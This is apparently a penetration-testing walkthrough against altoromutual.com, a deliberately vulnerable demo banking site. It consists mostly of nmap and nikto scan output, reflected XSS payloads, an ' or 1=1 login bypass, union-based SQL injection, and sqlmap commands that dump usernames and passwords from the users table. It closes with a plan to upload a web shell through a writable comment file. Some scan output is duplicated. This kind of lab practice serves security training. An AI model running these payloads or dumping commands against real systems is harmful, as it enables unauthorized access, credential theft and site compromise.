- Find the ip address, add it to scope (burp) and scan the site:
nikto –h www.altoromutual.com / nmap –sV 65.61.137.117
Not shown: 997 closed ports
NMAP: PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.0
443/tcp open ssl/http Microsoft IIS httpd 8.0
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NIKTO:
Retrieved x-powered-by header: ASP.NET
Server: Microsoft-IIS/8.0
Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
OSVDB-3092: /admin.htm: This might be interesting...
80/tcp open http Microsoft IIS httpd 8.0
443/tcp open ssl/http Microsoft IIS httpd 8.0
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NIKTO:
Retrieved x-powered-by header: ASP.NET
Server: Microsoft-IIS/8.0
Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
OSVDB-3092: /admin.htm: This might be interesting...
OSVDB-3092: /bank/: This
might be interesting...
- Checking the website and try to find more information about the application.
- Reflected XSS was found in the search box:
try to insert <script>alert()</script> or <script>a()</script>
I can find my XSS in the source code.
- Try to sign in and view the source.
- Try to sign in with invalid username: user’ password: 3456
we’ve got an error: (another injection point)
try to look inside the error, we have the local application path.
- The syntax is false try to find a true syntax and try to sign in
user' or 1=1-- - (the password is not relevant and we will connect with the first user).
- Success! Check the users.
- the
script is filtered
and order by is not working also. - 1 union select 1,2,3,4 from users-- - (Working!)
- Saving the valid (payload) id and password from burp into a file
uid=* &passw=123&btnSubmit=Login > /tmp/1.log- Use sqlmap to find the users and passwords:sqlmap -l /tmp/1.log --prefix="'" --suffix="-- -" -p uid --technique b
- DBMS is Microsoft Access.
- sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 –tables
sqlmap
-l /tmp/1.log --prefix="' or 1=1" --suffix="-- -"
--technique b --code=302 -T users -C username --dump
[11:38:21]
[WARNING] on Microsoft Access it is not possible to enumerate the
user password hashes
Change
to:
sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 --common-tables
sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 --common-tables
sqlmap
-l /tmp/1.log --prefix="' or 1=1" --suffix="-- -"
--technique b --code=302 -T users -C user,password --dump
- Looking for a writable location.
Fill the information, stop
it with intercept (burp)
check: www.altoromutual.com/comment.txt
we will see the user input there, that mean we have writable point, upload a web shell and encode URL.
check: www.altoromutual.com/comment.txt
we will see the user input there, that mean we have writable point, upload a web shell and encode URL.
